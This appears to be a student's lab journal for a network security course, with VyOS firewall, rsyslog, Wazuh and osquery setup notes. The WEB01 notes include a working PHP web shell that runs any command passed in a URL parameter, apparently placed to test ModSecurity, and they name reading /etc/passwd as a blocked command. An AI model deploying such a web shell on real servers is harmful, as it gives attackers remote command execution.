set firewall name LAN-to-DMZ rule 20 description "Allow SSH from MGMT-01 to DMZ"
set firewall name LAN-to-DMZ rule 20 action accept
set firewall name LAN-to-DMZ rule 20 destination port 22
set firewall name LAN-to-DMZ rule 20 protocol tcp
set firewall name LAN-to-DMZ rule 20 source address 172.16.150.10
# DMZ-to-LAN
set firewall name DMZ-to-LAN default-action drop
set firewall name DMZ-to-LAN enable-default-log
set firewall name DMZ-to-LAN rule 1 action accept
set firewall name DMZ-to-LAN rule 1 state established enable
set firewall name DMZ-to-LAN rule 10 description "wazuh agent communication with server"
set firewall name DMZ-to-LAN rule 10 action accept
set firewall name DMZ-to-LAN rule 10 destination address 172.16.200.10
set firewall name DMZ-to-LAN rule 10 destination port 1514,1515
set firewall name DMZ-to-LAN rule 10 protocol tcp
# LAN-to-WAN
set firewall name LAN-to-WAN default-action drop
set firewall name LAN-to-WAN enable-default-log
set firewall name LAN-to-WAN rule 1 action accept
# WAN-to-LAN
set firewall name WAN-to-LAN default-action drop
set firewall name WAN-to-LAN enable-default-log
set firewall name WAN-to-LAN rule 1 action accept
set firewall name WAN-to-LAN rule 1 state established enable
# Apply Zone Policies
set zone-policy zone DMZ from LAN firewall name LAN-to-DMZ
set zone-policy zone DMZ from WAN firewall name WAN-to-DMZ
set zone-policy zone LAN from DMZ firewall name DMZ-to-LAN
set zone-policy zone LAN from WAN firewall name WAN-to-LAN
set zone-policy zone WAN from DMZ firewall name DMZ-to-WAN
set zone-policy zone WAN from LAN firewall name LAN-to-WAN
commit
save
```
## Rip Configuration
```
configure
set protocols rip interface eth2
set protocols rip network '172.16.50.0/29'
commit
save
```
## SSH Configuration
```
# Restrict SSH access to LAN interface only
configure
set service ssh listen-address 172.16.150.2
commit
save
```

52
net-sec-controls-sec350/machines/FW-MGMT.md Normal file
View file

@ -0,0 +1,52 @@
# FW-MGMT Configuration
## Interface Configuration
```
configure
set interfaces ethernet eth0 description LAN
set interfaces ethernet eth1 description MGMT
set interfaces ethernet eth0 address 172.16.150.3/24
set interfaces ethernet eth1 address 172.16.200.2/28
commit
save
```
## Gateway & DNS Configuration
```
configure
set protocols static route 0.0.0.0/0 next-hop 172.16.150.2
set system name-server 172.16.150.2
commit
save
```
## DNS Forwarding
```
configure
set service dns forwarding listen-address 172.16.200.2
set service dns forwarding allow-from 172.16.200.0/28
set service dns forwarding system
commit
save
```
## Zone Configuration
```
configure
set zone-policy zone LAN interface eth0
set zone-policy zone MGMT interface eth1
commit
save
```
## Firewall Configuration
copy current configuration form `configs` directory
## RIP Configuration
```
configure
set protocols rip interface eth0
set protocols rip network '172.16.200.0/28'
commit
save
```

109
net-sec-controls-sec350/machines/FW01.md Normal file
View file

@ -0,0 +1,109 @@
# FW01 Configuration
## Initial Setup
- Change password:
```
set system login user vyos authentication plaintext-password password
```
## Hostname Configuration
```
configure
set system host-name fw01-charlotte
commit
save
```
## Interface Configuration
```
configure
set interfaces ethernet eth0 description SEC350-WAN
set interfaces ethernet eth1 description CHARLOTTE-DMZ
set interfaces ethernet eth2 description CHARLOTTE-LAN
set interfaces ethernet eth0 address 10.0.17.151/24
set interfaces ethernet eth1 address 172.16.50.2/29
set interfaces ethernet eth2 address 172.16.150.2/24
commit
save
```
## Gateway & DNS Configuration
```
configure
set protocols static route 0.0.0.0/0 next-hop 10.0.17.2
set system name-server 10.0.17.2
commit
save
```
## NAT Configuration
```
configure
# DMZ to WAN NAT
set nat source rule 10 description "NAT FROM DMZ to WAN"
set nat source rule 10 outbound-interface eth0
set nat source rule 10 source address 172.16.50.0/29
set nat source rule 10 translation address masquerade
# LAN to WAN NAT
set nat source rule 20 description "NAT FROM LAN to WAN"
set nat source rule 20 outbound-interface eth0
set nat source rule 20 source address 172.16.150.0/24
set nat source rule 20 translation address masquerade
# MGMT to WAN NAT
set nat source rule 30 description "NAT FROM MGMT to WAN"
set nat source rule 30 outbound-interface eth0
set nat source rule 30 source address 172.16.200.0/28
set nat source rule 30 translation address masquerade
commit
save
```
## DNS Forwarding Configuration
```
configure
# DMZ DNS Forwarding
set service dns forwarding listen-address 172.16.50.2
set service dns forwarding allow-from 172.16.50.0/29
# LAN DNS Forwarding
set service dns forwarding listen-address 172.16.150.2
set service dns forwarding allow-from 172.16.150.0/24
set service dns forwarding system
commit
save
```
## Zone Configuration
```
configure
set zone-policy zone WAN interface eth0
set zone-policy zone DMZ interface eth1
set zone-policy zone LAN interface eth2
commit
save
```
## Firewall Configuration
copy current configuration from `configs` directory
## RIP Configuration
```
configure
set protocols rip interface eth2
set protocols rip network '172.16.50.0/29'
commit
save
```
## Syslog Configuration (remove when appropriate)
```
# When log01 is active
set system syslog host 172.16.50.5 facility authpriv level info
# When log01 is retired
delete system syslog host 172.16.50.5
```

123
net-sec-controls-sec350/machines/LOG01.md Normal file
View file

@ -0,0 +1,123 @@
# LOG01 Configuration
> **Note**: This is the original log01 server that will eventually be retired, then brought back as a jump server.
## Basic Setup
- Set hostname to `log01-charlotte`
- Add sudo user `charlotte:password`
- Set network adapter to DMZ
- Configure static IP via nmtui:
- IP Address: `172.16.50.5/29`
- Gateway & DNS: `172.16.50.2`
## Configure Firewall for Syslog
```
sudo firewall-cmd --add-port=514/tcp --permanent
sudo firewall-cmd --add-port=514/udp --permanent
sudo firewall-cmd --reload
```
## Configure Rsyslog
### Enable Syslog Input Modules
Edit `/etc/rsyslog.conf` and uncomment these lines:
```
# Provides UDP syslog reception
module(load="imudp")
input(type="imudp" port="514")
# Provides TCP syslog reception
module(load="imtcp")
input(type="imtcp" port="514")
```
### Configure High Precision Timestamps
Add to `/etc/rsyslog.conf`:
```
$ActionFileDefaultTemplate RSYSLOG_SyslogProtocol23Format
template(name="BetterTiming" type="string" string="%timestamp:::date-rfc3339% %HOSTNAME% %syslogtag%%msg%\n")
```
Apply the template to the desired log file:
```
# Example: Add ;BetterTiming suffix to a log destination
*.info;mail.none;authpriv.none;cron.none /var/log/messages;BetterTiming
```
### Configure Log Organization
Create a file named `/etc/rsyslog.d/sec350.conf` with these contents:
```
# Input modules
module(load="imudp")
input(type="imudp" port="514")
module(load="imtcp")
input(type="imtcp" port="514")
# Creating templates for storing logs dynamically
$template DynFile,"/var/log/%HOSTNAME%/%$YEAR%/%$MONTH%/%$DAY%/%programname%.log"
$template RemoteLogs,"/var/log/remote/%HOSTNAME%/%$YEAR%/%$MONTH%/%$DAY%/%programname%.log"
# Create a ruleset for remote devices
ruleset(name="RemoteDevice"){
action(type="omfile" dynaFile="RemoteLogs")
}
# Direct local logs to files
:programname, !startswith, "rsyslog" ?DynFile
# Direct messages from remote hosts to the ruleset
:inputname, isequal, "imudp" call RemoteDevice
:inputname, isequal, "imtcp" call RemoteDevice
```
### Restart Rsyslog
```
sudo systemctl restart rsyslog
```
## Monitor Incoming Logs
```
tail -f /var/log/messages
```
Or check specific remote log files:
```
tail -f /var/log/remote/*/*/*/*/sshd.log
```
## Recommissioned as Jump Server
When log01 is repurposed as a jump server:
1. Change IP address to: `172.16.50.4/29`
2. Change hostname: `sudo hostnamectl set-hostname jump-charlotte`
### SSH Configuration for Passwordless Access
```bash
# Create dedicated user for jump access
useradd -m -d /home/charlotte-jump -s /bin/bash charlotte-jump
# Disable password authentication
sudo sed -i 's/PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config
# Create SSH directory structure with proper permissions
mkdir -p /home/charlotte-jump/.ssh
chmod 700 /home/charlotte-jump/.ssh
# Add the public key to authorized_keys
echo "ssh-rsa AAAAB3N...your-public-key..." >> /home/charlotte-jump/.ssh/authorized_keys
# Set proper permissions and ownership
chmod 600 /home/charlotte-jump/.ssh/authorized_keys
chown -R charlotte-jump:charlotte-jump /home/charlotte-jump/.ssh
# Restart SSH service
systemctl restart sshd
```
### Wazuh Agent Installation
```bash
sudo WAZUH_MANAGER='172.16.200.10' WAZUH_AGENT_GROUP='linux' WAZUH_AGENT_NAME='jump-charlotte' rpm -ihv wazuh-agent-4.7.3-1.x86_64.rpm
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```

27
net-sec-controls-sec350/machines/MGMT01.md Normal file
View file

@ -0,0 +1,27 @@
# MGMT01 Configuration
## Network Configuration
- Configure static IP via network manager:
- IP Address: `172.16.150.10/24`
- Gateway & DNS: `172.16.150.2`
- Network: LAN
## Chrome Remote Desktop Setup
1. Open Chrome and sign in with charlotte.croce@mymail.champlain.edu
2. Enable sync if prompted
3. Go to remotedesktop.google.com and install the app
4. On your main host (laptop):
- Go to https://g.co/crd/headless
- Download and install the Chrome Remote Desktop package
- For dependency issues:
```
sudo apt install libutempter0 xbase-clients xserver-xorg-video-dummy xvfb
sudo dpkg -i google-chrome-stable_current_amd64
```
5. Follow the setup prompts and create a PIN
6. Log out of the remote computer before attempting to connect
## Notes
- With current firewall configs, this machine should be able to access:
- SSH to systems in the DMZ (port 22)
- HTTPS access to wazuh server (port 443)

7
net-sec-controls-sec350/machines/MGMT02.md Normal file
View file

@ -0,0 +1,7 @@
# MGMT02 Configuration
## Network Configuration
- Configure static IP:
- IP Address: `172.16.200.11/28`
- Gateway & DNS: `172.16.200.2`
- Network: MGMT

35
net-sec-controls-sec350/machines/NGINX01.md Normal file
View file

@ -0,0 +1,35 @@
# NGINX01 Configuration
## Basic Setup
- Set hostname to `nginx01-charlotte`
- Add sudo user `charlotte`
- Set network via nmtui:
- IP Address: `172.16.50.3/29`
- Gateway & DNS: `172.16.50.2`
- Network adapter: DMZ
## Install and Configure NGINX
```bash
# Install NGINX
sudo apt update
sudo apt install nginx -y
sudo systemctl enable nginx
sudo systemctl start nginx
# Create custom index page
echo "<h1>NGINX01 - Charlotte Croce</h1>" | sudo tee /var/www/html/index.html
```
* Remember to add firewall and port forwarding rule for this new IP!
* Also, add firewall-cmd rules if applicable
## Install Wazuh Agent
```bash
# Download and install Wazuh agent
curl -o wazuh-agent-4.7.5-1.amd64.deb https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/wazuh-agent-4.7.5-1.amd64.deb && sudo WAZUH_MANAGER='172.16.200.10' WAZUH_AGENT_GROUP='linux' WAZUH_AGENT_NAME='nginx01-charlotte' dpkg -i wazuh-agent-4.7.5-1.amd64.deb
# Start the agent
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```

37
net-sec-controls-sec350/machines/RW01.md Normal file
View file

@ -0,0 +1,37 @@
# RW01 Configuration
## Basic Setup
- Set hostname to `rw01-charlotte`
- Add sudo user `charlotte:password`
- IP Address: `10.0.17.51/24`
- Gateway & DNS: `10.0.17.2`
## Static Route for DMZ Access
```bash
sudo ip route add 172.16.50.0/29 via 10.0.17.151
sudo systemctl restart NetworkManager
traceroute 172.16.50.3
```
## Rsyslog Configuration for High Precision Timestamps
1. Edit `/etc/rsyslog.conf`
2. Comment out this line to enable high precision timestamps:
```
# $ActionFileDefaultTemplate RSYSLOG_TraditionalFileFormat
```
3. Restart rsyslog:
```bash
sudo systemctl restart rsyslog
```
## SSH Key Creation for Jump Server Access
Generate a dedicated SSH key for jump server access:
```bash
ssh-keygen -t rsa -b 4096 -C "ssh to jump"
# Use filename: jump-charlotte
# Add a passphrase
```
To connect to the jump server using this key:
```bash
ssh -i ~/.ssh/jump-charlotte charlotte-jump@172.16.50.4
```

24
net-sec-controls-sec350/machines/TRAVELER.md Normal file
View file

@ -0,0 +1,24 @@
# TRAVELER Configuration
Windows machine to replace RW01
## Network Configuration
- System is on WAN network
- IP address: `10.0.17.51/24`
- Default gateway: `10.0.17.2`
- DNS server: `10.0.17.2`
## SSH Key Creation for Jump Server Access
Generate SSH keys using PowerShell:
```bash
# Generate new SSH key
ssh-keygen -t rsa -b 4096 -C "traveler to jump"
# Use filename: jump-charlotte
# Add a passphrase
```
To connect to the jump server:
```powershell
ssh -i C:\Users\username\.ssh\jump-charlotte charlotte-jump@10.0.17.151
```
Web Access
Can access nginx01 via `http://10.0.17.151:80` (port forwarded through edge-01)

69
net-sec-controls-sec350/machines/WAZUH.md Normal file
View file

@ -0,0 +1,69 @@
# Wazuh Server Configuration
## Network Configuration
- Set hostname: `sudo hostnamectl hostname wazuh-charlotte`
- Configure static IP with netplan by editing `/etc/netplan/00-installer-config.yaml`:
```yaml
network:
ethernets:
ens160:
addresses:
- 172.16.200.10/28
nameservers:
addresses: [172.16.200.2]
routes:
- to: default
via: 172.16.200.2
version: 2
```
- Apply netplan configuration:
```
sudo netplan apply
```
## Wazuh Installation
> **IMPORTANT**: Take a snapshot before installation
Run the single-node installation command:
```
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh && sudo bash ./wazuh-install.sh -a -i
```
> Note: The `-i` flag ignores minimum requirements of 2 CPU and 4 GB RAM
**IMPORTANT**: Save the auto-generated password shown after installation, you will need it later.
## Accessing the Wazuh Dashboard
- Try accessing the dashboard at: http://172.16.200.10/app/login
- Login with the auto-generated credentials
## Wazuh Agent Management
1. Create a new agent group:
- Wazuh dropdown > Management > Groups > Create a new group called "linux"
2. Deploy a new agent:
- Wazuh dropdown > Agents > Deploy a new agent
- Configuration options:
- OS: Redhat/CentOS
- Version: CentOS 6 or higher (works on Rocky 8)
- Architecture: x86_64
- Server IP: 172.16.200.10
- Agent Group: Linux
3. The web interface will generate an installation command for your agents
## Firewall Requirements
Ensure these ports are open:
- **1514/TCP** for agent communication
- **1515/TCP** for enrollment via automatic agent request
- **55000/TCP** for enrollment via Wazuh server API
## Agent Directory Structure
Wazuh agent files are stored in `/var/ossec/`. Key directories include:
- `/var/ossec/etc/` - Configuration files
- `/var/ossec/etc/ossec.conf` - agent IP settings
- `/var/ossec/logs/` - Log files
- `/var/ossec/queue/` - Communication queue
- `/var/ossec/agentless/` - Agentless monitoring
## Viewing Security Events
Dropdown > Modules > Security Events

104
net-sec-controls-sec350/machines/WEB01.md Normal file
View file

@ -0,0 +1,104 @@
# WEB01 Configuration
## Basic Setup
- Set hostname to `web01-charlotte`
- Add sudo user `charlotte:password`
- Set network via nmtui:
- IP Address: `172.16.50.3/29`
- Gateway & DNS: `172.16.50.2`
- Network adapter: DMZ
## Install and Configure HTTPD
```
# Install apache web server
sudo yum install httpd
sudo systemctl enable httpd
sudo systemctl start httpd
# If you need to edit the main config file:
sudo vi /etc/httpd/conf/httpd.conf
```
## Rsyslog Configuration
### Install rsyslog (if not installed)
```
sudo yum install rsyslog
```
### Configure Rsyslog for High Precision Timestamps
Edit `/etc/rsyslog.conf` and add these lines:
```
$ActionFileDefaultTemplate RSYSLOG_SyslogProtocol23Format
template(name="BetterTiming" type="string" string="%timestamp:::date-rfc3339% %HOSTNAME% %syslogtag%%msg%\n")
```
Note: ModSecurity will prevent dangerous commands like cat /etc/passwd while allowing safe commands like whoami and /sbin/ifconfig.
Apply the template to the desired log file:
```
# Example: Add ;BetterTiming suffix to a log destination
*.info;mail.none;authpriv.none;cron.none /var/log/messages;BetterTiming
```
### Configure Log Forwarding (when log01 is active)
Create a file at `/etc/rsyslog.d/sec350.conf` with these contents:
```
# For general logging
user.notice @172.16.50.5
# For authentication logging
authpriv.* @172.16.50.5
```
Restart rsyslog:
```
sudo systemctl restart rsyslog
```
## Install Wazuh Agent
```
# Download and install Wazuh agent
curl -o wazuh-agent-4.7.5-1.x86_64.rpm https://packages.wazuh.com/4.x/yum/wazuh-agent-4.7.5-1.x86_64.rpm && sudo WAZUH_MANAGER='172.16.200.10' WAZUH_AGENT_GROUP='linux' WAZUH_AGENT_NAME='web01-charlotte' rpm -ihv wazuh-agent-4.7.5-1.x86_64.rpm
# Start the agent
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```
## CentOS Repo Fix (if needed)
```
sudo sed -i s/mirror.centos.org/vault.centos.org/g /etc/yum.repos.d/CentOS-*.repo
sudo sed -i s/^#.*baseurl=http/baseurl=http/g /etc/yum.repos.d/CentOS-*.repo
sudo sed -i s/^mirrorlist=http/#mirrorlist=http/g /etc/yum.repos.d/CentOS-*.repo
```
## Web Application Firewall (ModSecurity)
Install ModSecurity and PHP:
```bash
sudo yum install mod_security mod_security_crs php php-common php-opcache php-cli php-gd php-curl php-mysqlnd -y
```
## Create Test PHP Webshell
Create `/var/www/html/shell.php` with the following content:
```
<!-- source: https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985 -->
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
```
> [!Note]
> ModSecurity will prevent dangerous commands like `cat /etc/passwd` while allowing safe commands like `whoami` and `/sbin/ifconfig`.

10
net-sec-controls-sec350/machines/WKS01.md Normal file
View file

@ -0,0 +1,10 @@
# WKS01 Configuration
## Network Configuration
- Configure static IP via network manager:
- IP Address: `172.16.150.50/24`
- Gateway & DNS: `172.16.150.2`
- Network: LAN
## Notes
- This workstation has HTTP access to web01 in the DMZ through firewall rules

27
net-sec-controls-sec350/osquery_project/01_research.md Normal file
View file

@ -0,0 +1,27 @@
|[HOME](README.md)|[RESEARCH](01_research.md)|[INSTALLATION](02_install_rocky.md)|[CLIENT APP](03_client_app.md)|[INTEGRATION](04_wazuh_integration.md)|[DEMONSTRATION](05_demonstration.md)|[CONCLUSION](06_conclusion.md)|
|-|-|-|-|-|-|-|
# Research
Osquery is an open-source OS instrumentation framework that uses SQL-like syntax to query the OS as if it were a relational database. It was created by Facebook(Meta) in 2014.
## Features
- **Cross-platform**: macOS, Linux, FreeBSD, and Windows
- **Data collection**: running processes, user logins, kernel modules, network connections, browser plugins, hardware events, file hashes, and more
- **SQL-based queries**: Users can write SQL queries to explore data across all operating systems and infrastructure
- **Query packs**: Pre-built collections of queries for specific tasks like incident response, vulnerability management, or compliance monitoring
## Components
1. [**Osqueryi**](03_client_app.md): An interactive console shell for running ad-hoc queries and exploring the system
2. [**Osqueryd**](02_install_rocky.md): A daemon that schedules queries and monitors system changes
> [!Warning]
> Osquery generates approximately 110MB of data per endpoint per day. This requires careful consideration of storage and management, especially for large-scale deployments.
Sources:
- https://www.uptycs.com/blog/threat-research-report-team/osquery-guide
- https://rearc.io/blog/osquery-introduction
- https://www.rapid7.com/blog/post/2016/05/09/introduction-to-osquery-for-threat-detection-dfir/
___
|[<<<<](README.md)|[>>>>](02_install_rocky.md)|
|-|-|

54
net-sec-controls-sec350/osquery_project/02_install_rocky.md Normal file
View file

@ -0,0 +1,54 @@
|[HOME](README.md)|[RESEARCH](01_research.md)|[INSTALLATION](02_install_rocky.md)|[CLIENT APP](03_client_app.md)|[INTEGRATION](04_wazuh_integration.md)|[DEMONSTRATION](05_demonstration.md)|[CONCLUSION](06_conclusion.md)|
|-|-|-|-|-|-|-|
# Install osquery on Rocky Linux (web01)
## Installation
### DMZ-to-WAN temporary firewall rule
Add a temporary rule for software updates that we either delete, disable or discard when complete
```bash
set firewall name DMZ-to-WAN rule 999 action accept
set firewall name DMZ-to-WAN rule 999 source address 172.16.50.3
```
### Install via yum repository
- (current version: 15.5.0) -- [source](https://osquery.io/downloads/official/5.15.0)
```bash
curl -L https://pkg.osquery.io/rpm/GPG | sudo tee /etc/pki/rpm-gpg/RPM-GPG-KEY-osquery
sudo yum install yum-utils -y
sudo yum-config-manager --add-repo https://pkg.osquery.io/rpm/osquery-s3-rpm.repo
sudo yum-config-manager --enable osquery-s3-rpm-repo
sudo yum install osquery -y
```
## Configuration
> [!Warning]
> Linux systems running journald will collect logging data originating from the kernel audit subsystem (something that osquery enables) from several sources, including audit records. To avoid performance problems on busy boxes (specially when osquery event tables are enabled), it is recommended to mask audit logs from entering the journal with the following command
> ```bash
> systemctl mask --now systemd-journald-audit.socket
> ```
> -- [source](https://osquery.readthedocs.io/en/latest/installation/install-linux/)
The `/etc/init.d/osqueryd` script does not automatically start the daemon until a configuration file is created. This is the command to copy the existing example config file into your working config files directory, this file may need further configuration.
```bash
sudo cp /opt/osquery/share/osquery/osquery.example.conf /etc/osquery/osquery.conf
```
## Running osquery
### Standalone/Client App (osqueryi)
To start a standalone osquery use: `osqueryi`. This does not need an osquery server or service. [osqueryi page](03_client_app.md)
### Daemon Service (osqueryd)
```bash
sudo systemctl enable osqueryd
sudo systemctl start osqueryd
```
> [!Note]
> The interactive shell and daemon do NOT communicate!
___
Source: https://documentation.wazuh.com/current/user-manual/capabilities/system-inventory/osquery.html
|[<<<<](01_research.md)|[>>>>](03_client_app.md)|
|-|-|

59
net-sec-controls-sec350/osquery_project/03_client_app.md Normal file
View file

@ -0,0 +1,59 @@
|[HOME](README.md)|[RESEARCH](01_research.md)|[INSTALLATION](02_install_rocky.md)|[CLIENT APP](03_client_app.md)|[INTEGRATION](04_wazuh_integration.md)|[DEMONSTRATION](05_demonstration.md)|[CONCLUSION](06_conclusion.md)|
|-|-|-|-|-|-|-|
# osquery Client Application (osqueryi)
`osqueryi` is an interactive shell for osquery that uses SQL-like queries to gather system information. It allows you to query various aspects of an operating system as if they were tables in a database.
## Common queries:
Inspect system processes:
```sql
osquery> SELECT name, path, pid FROM processes WHERE name = 'httpd';
+-------+-----------------+-------+
| name | path | pid |
+-------+-----------------+-------+
| httpd | /usr/sbin/httpd | 82243 |
| httpd | /usr/sbin/httpd | 86173 |
| httpd | /usr/sbin/httpd | 86174 |
| httpd | /usr/sbin/httpd | 86175 |
| httpd | /usr/sbin/httpd | 86176 |
+-------+-----------------+-------+
```
List installed packages:
```sql
osquery> SELECT name, version FROM rpm_packages;
+-------------------------------+------------+
| name | version |
+-------------------------------+------------+
| NetworkManager | 1.36.0 |
| NetworkManager-config-server | 1.36.0 |
| NetworkManager-libnm | 1.36.0 |
| NetworkManager-team | 1.36.0 |
| NetworkManager-tui | 1.36.0 |
| acl | 2.2.53 |
| adcli | 0.8.2 |
| alsa-sof-firmware | 1.9.3 |
| apr | 1.6.3 |
| apr-util | 1.6.1 |
...
```
Check listening network ports:
```sql
osquery> SELECT pid, address, port FROM listening_ports;
+-------+-----------+-------+
| pid | address | port |
+-------+-----------+-------+
| 1101 | 0.0.0.0 | 22 |
| 86176 | :: | 80 |
| 1101 | :: | 22 |
| 34468 | 0.0.0.0 | 51361 |
| 942 | 127.0.0.1 | 323 |
| 942 | ::1 | 323 |
| 1068 | :: | 58 |
| 924 | | 0 |
| 924 | | 0 |
...
```
___
|[<<<<](02_install_rocky.md)|[>>>>](04_wazuh_integration.md)|
|-|-|

107
net-sec-controls-sec350/osquery_project/04_wazuh_integration.md Normal file
View file

@ -0,0 +1,107 @@
|[HOME](README.md)|[RESEARCH](01_research.md)|[INSTALLATION](02_install_rocky.md)|[CLIENT APP](03_client_app.md)|[INTEGRATION](04_wazuh_integration.md)|[DEMONSTRATION](05_demonstration.md)|[CONCLUSION](06_conclusion.md)|
|-|-|-|-|-|-|-|
# Wazuh Integration
## Requirements
- Wazuh manager installed and configured on the wazuh server
- Wazuh agent installed and connected on WEB01
- osquery already installed on WEB01 ([installation guide](02_install_rocky.md))
- root privileges
## Configure osquery on web01
### on WEB01
- create osquery configuration file. if already created with defaults, edit it
```json
> sudo nano /etc/osquery/osquery.conf
{
"options": {
"logger_path": "/var/log/osquery",
"disable_logging": "false",
"schedule_splay_percent": "10",
"utc": "true"
},
"schedule": {
"system_info": {
"query": "SELECT hostname, cpu_brand, physical_memory FROM system_info;",
"interval": 300
},
"processes": {
"query": "SELECT pid, name, path, cmdline FROM processes;",
"interval": 300
},
"logged_in_users": {
"query": "SELECT user, host, time FROM logged_in_users;",
"interval": 300
},
"firewall_status": {
"query": "SELECT * FROM shell WHERE command = 'firewall-cmd --state';",
"interval": 300
}
},
...
```
- create log directories with correct permissions for storing osquery results
```bash
sudo mkdir -p /var/log/osquery
sudo chown -R root:root /var/log/osquery
sudo chmod -R 755 /var/log/osquery
```
- restart osqueryd
```bash
sudo systemctl restart osqueryd
sudo systemctl status osqueryd
```
## Configure WEB01 -> Wazuh integration
### On WEB01
- configure Wazuh agent to monitor osquery logs
```xml
> sudo nano /var/ossec/etc/ossec.conf
# Add these blocks inside the <ossec_config> section
# make sure this wodle is NOT disabled, as this service is disabled by default
<wodle name="osquery">
<disabled>no</disabled>
<run_daemon>yes</run_daemon>
<log_path>/var/log/osquery/osqueryd.results.log</log_path>
<config_path>/etc/osquery/osquery.conf</config_path>
<add_labels>yes</add_labels>
</wodle>
<localfile>
<log_format>json</log_format>
<location>/var/log/osquery/osqueryd.results.log</location>
</localfile>
```
- restart wazuh agent
```bash
sudo systemctl restart wazuh-agent
sudo systemctl status wazuh-agent
```
## Validation
### on WEB01
- Run a manual query to generate an immediate log entry
```
sudo osqueryi --json "SELECT * FROM processes LIMIT 5;" > /var/log/osquery/osqueryd.results.log
```
- Check if Wazuh detected it
```
sudo tail -f /var/ossec/logs/ossec.log
```
### on Wazuh Server
- Go to Modules Menu -> Security Events -> Events
- In left panel, add rule.groups: osquery
![image](../../assets/54a8264b-ffac-4f98-be7d-5d1abce24233.png)
___
|[<<<<](03_client_app.md)|[>>>>](05_demonstration.md)|
|-|-|

7
net-sec-controls-sec350/osquery_project/05_demonstration.md Normal file
View file

@ -0,0 +1,7 @@
|[HOME](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/net-sec-controls-sec350/osquery_project/README.md)|[RESEARCH](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/net-sec-controls-sec350/osquery_project/01_research.md)|[INSTALLATION](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/net-sec-controls-sec350/osquery_project/02_install_rocky.md)|[CLIENT APP](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/net-sec-controls-sec350/osquery_project/03_client_app.md)|[INTEGRATION](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/net-sec-controls-sec350/osquery_project/04_wazuh_integration.md)|[DEMONSTRATION](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/net-sec-controls-sec350/osquery_project/05_demonstration.md)|[CONCLUSION](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/net-sec-controls-sec350/osquery_project/06_conclusion.md)|
|-|-|-|-|-|-|-|
# Demonstration
___
|[<<<<](04_wazuh_integration.md)|[>>>>](06_conclusion.md)|
|-|-|

19
net-sec-controls-sec350/osquery_project/06_conclusion.md Normal file
View file

@ -0,0 +1,19 @@
|[HOME](README.md)|[RESEARCH](01_research.md)|[INSTALLATION](02_install_rocky.md)|[CLIENT APP](03_client_app.md)|[INTEGRATION](04_wazuh_integration.md)|[DEMONSTRATION](05_demonstration.md)|[CONCLUSION](06_conclusion.md)|
|-|-|-|-|-|-|-|
# Conclusion
## Pros
- open source
- lightweight
- works on Linux, macOS, and Windows
## Cons
- stores current system state, which means it doesn't store historical data
## Overview
In conclusion, the OSQuery project demonstrates the potential of integrating OSQuery with Wazuh for enhanced security monitoring. OSQuery provides a powerful tool for querying and monitoring system data, while Wazuh offers robust endpoint detection and response capabilities. The integration of these tools allows for real-time event detection and analysis, offering significant benefits in terms of security visibility and incident response. However, considerations regarding complexity and resource requirements are important when implementing such a system. Overall, the integration of OSQuery with Wazuh presents a promising approach to strengthening corporate security infrastructure.
___
|[<<<<](05_demonstration.md)||
|-|-|

23
net-sec-controls-sec350/osquery_project/README.md Normal file
View file

@ -0,0 +1,23 @@
|[HOME](README.md)|[RESEARCH](01_research.md)|[INSTALLATION](02_install_rocky.md)|[CLIENT APP](03_client_app.md)|[INTEGRATION](04_wazuh_integration.md)|[DEMONSTRATION](05_demonstration.md)|[CONCLUSION](06_conclusion.md)|
|-|-|-|-|-|-|-|
Charlotte Croce, Andrei Gorlitsky, Benjamin Tyler
# Project 1 -OSQuery
🚀 Your security engineering technical lead has asked you to investigate a potential security tool called [OSQuery](https://github.com/osquery/osquery). They have asked that you be prepared to demonstrate the application itself and its integration into the corporate EDR platform (wazuh). You are expected to demo your results to the full security engineering team in one week.
## Demonstration Video
Google Drive link: https://drive.google.com/file/d/1TmDQrPufHJVOyXyVaR0a5f4StchSyOn2/view?usp=drive_link
## Documentation Contents
- [RESEARCH:](01_research.md) Conduct high level research on OSQuery and explain what it does at a high level
- [INSTALLATION:](02_install_rocky.md) Install OSQuery on either web01 (rocky) or wks01 (windows 10)
- [CLIENT APP:](03_client_app.md) Investigate and demonstrate some of the features of the OSQuery client application
- [INTEGRATION:](04_wazuh_integration.md) Integrate OSQuery with Wazuh
- [DEMONSTRATION:](05_demonstration.md) Develop an end to end demonstration that shows the triggering of an event that is picked up by OSQuery and how that event eventually makes it to Wazuh.
- [CONCLUSION:](06_conclusion.md) Conclude by discussing any pros and cons of this tool and integration.
___
||[>>>>](01_research.md)|
|-|-|

38
net-sec-controls-sec350/rsyslog.md Normal file
View file

@ -0,0 +1,38 @@
# rsyslog configuration
an open-source software used on linux computer systems for forwarding log messages through a network. \
`sudo apt/yum install rsyslog`
## server
### open ports 514 on server
```
sudo firewall-cmd --add-port=514/tcp --permament
sudo firewall-cmd --add-port=514/udp --permament
sudo firewall-cmd --reload
```
### enable log input modules
the `/etc/rsyslog.conf` file needs to be modified to receive syslog messages over ports 514 tcp and udp. Uncomment the appropriate lines (see below) and restart the rsyslog service. \
![image](../assets/48994d9b-0f17-4626-ab9d-985d37c5e506.png)
### monitor for incoming logs
- `tail -f /var/log/messages`
## client
### configure log forwarding to server
- rsyslog needs to be installed on client as well: `sudo yum install rsyslog`
- create the following file: `/etc/rsyslog.d/sec350.conf`, add the line `user.notice @172.16.50.5`, and restart rsyslog
